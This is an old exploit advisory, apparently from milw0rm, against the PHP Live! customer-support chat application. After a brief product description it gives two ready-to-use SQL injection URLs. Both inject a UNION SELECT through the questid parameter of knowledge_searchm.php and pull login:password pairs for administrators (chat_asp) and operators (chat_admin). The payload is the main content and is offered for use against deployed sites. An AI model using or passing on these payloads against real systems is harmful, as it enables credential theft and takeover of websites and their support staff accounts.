Original author: Found by Xar of h4ck-y0u, Greets to Don & ViSiOn Modified version: skys Contact: skysbsb[at]gmail.com [!]Info[!] PHP Live! (© OSI Codes Inc.) enables live help and live customer support communication directly from your website. With PHP Live!, you can provide one-on-one chat assistance in real-time, answer visitor questions and add that extra human touch to your website. [!]SQL Injection[!] The original code was a little mistake, the right code: Code: Set the proper l(login) var in the parameter request. In this example, l=admin http://www.site.com/path-to-phplive/admin/traffic/knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_asp%20limit%200,1 In the Answer field, you will see the login:password for the http://www.site.com/path-to-phplive/setup/login.php or, if you want to mess only just with the operators, http://www.site.com/path-to-phplive/admin/traffic/knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_admin%20limit%200,1 # milw0rm.com [2009-07-24]